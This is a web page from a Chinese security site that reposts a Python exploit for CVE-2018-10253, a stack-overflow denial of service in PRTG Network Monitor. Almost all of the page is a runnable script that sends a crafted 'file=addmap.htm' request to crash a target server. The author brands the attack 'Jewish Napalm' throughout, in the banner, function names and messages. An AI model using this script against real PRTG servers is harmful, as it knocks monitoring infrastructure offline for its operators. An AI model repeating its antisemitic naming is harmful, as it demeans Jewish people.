首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service) 来源：@Lucas "luriel" Carmo 作者：luriel 发布时间：2018-04-24   # Exploit Title: PRTG 18.1.39.1648 - Stack Overflow # Date: 2018-04-21 # Exploit Author: Lucas "luriel" Carmo # Vendor Homepage: https://www.paessler.com/prtg # Software Link: https://www.paessler.com/download/prtg-download # Version: 18.1.39.1648 # CVE : CVE-2018-10253 # Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5 # http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/   #!/usr/bin/python   import requests import sys import os import re import socket   green = "\033[1;32m" yellow = '\033[1;33m' normal = '\033[0;0m' banner = """      ██╗███████╗██╗    ██╗██╗███████╗██╗  ██╗    ███╗   ██╗ █████╗ ██████╗  █████╗ ██╗     ███╗   ███╗      ██║██╔════╝██║    ██║██║██╔════╝██║  ██║    ████╗  ██║██╔══██╗██╔══██╗██╔══██╗██║     ████╗ ████║      ██║█████╗  ██║ █╗ ██║██║███████╗███████║    ██╔██╗ ██║███████║██████╔╝███████║██║     ██╔████╔██║ ██   ██║██╔══╝  ██║███╗██║██║╚════██║██╔══██║    ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║     ██║╚██╔╝██║ ╚█████╔╝███████╗╚███╔███╔╝██║███████║██║  ██║    ██║ ╚████║██║  ██║██║     ██║  ██║███████╗██║ ╚═╝ ██║  ╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝  ╚═╝    ╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝ """     banner2 = """                                             Author: @Lucas "luriel" Carmo """   os.system('clear')   print(green+banner) print(yellow+banner2) print(normal)   def check_http(url):     pattern = re.compile("http://")     return re.search(pattern, url)   def sanitize_url(url):     if(not check_http(url)):         return "http://" + url     return url   def check_server(url):     r = requests.get(url, timeout=4)     code = r.status_code   def send_jewish_payload(url):     payload = {'file':'addmap.htm'}     r = requests.post(url, params=payload)   def main():     try:         if len(sys.argv) <= 3 and len (sys.argv) >= 2:             try:                 url = sanitize_url(sys.argv[1])                 print(' [#] LOADING!')                 if (check_server(url) != 404):                     send_jewish_payload(url)                 else:                     print(' [!] Server shutdown or not found')             except requests.exceptions.ConnectionError:                 print(' [~] BOOOOOM! PRTG Server has been exploded!')             except requests.exceptions.InvalidURL:                 print(' [!] Invalid URL')             except requests.exceptions.Timeout:                 print(' [!] Connection Timeout\n')         else:             print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')     except KeyboardInterrupt:         print(' [!] Jewish Napalm Canceled;.....[./]') if __name__ == '__main__':     main()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apache CouchDB 1.7.0 and 2.x b ·Interspire Email Marketer < 6. ·Kaspersky KSN Remote Code Exec ·VLC Media Player/Kodi/PopcornT ·lastore-daemon D-Bus Privilege ·Ericsson-LG iPECS NMS A.1Ac - ·ASUS infosvr Authentication By ·R 3.4.4 - Local Buffer Overflo ·Chrome V8 JIT NodeProperties:: ·Allok Video to DVD Burner 2.6. ·Microsoft Internet Explorer 11 ·Easy File Sharing Web Server 7   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved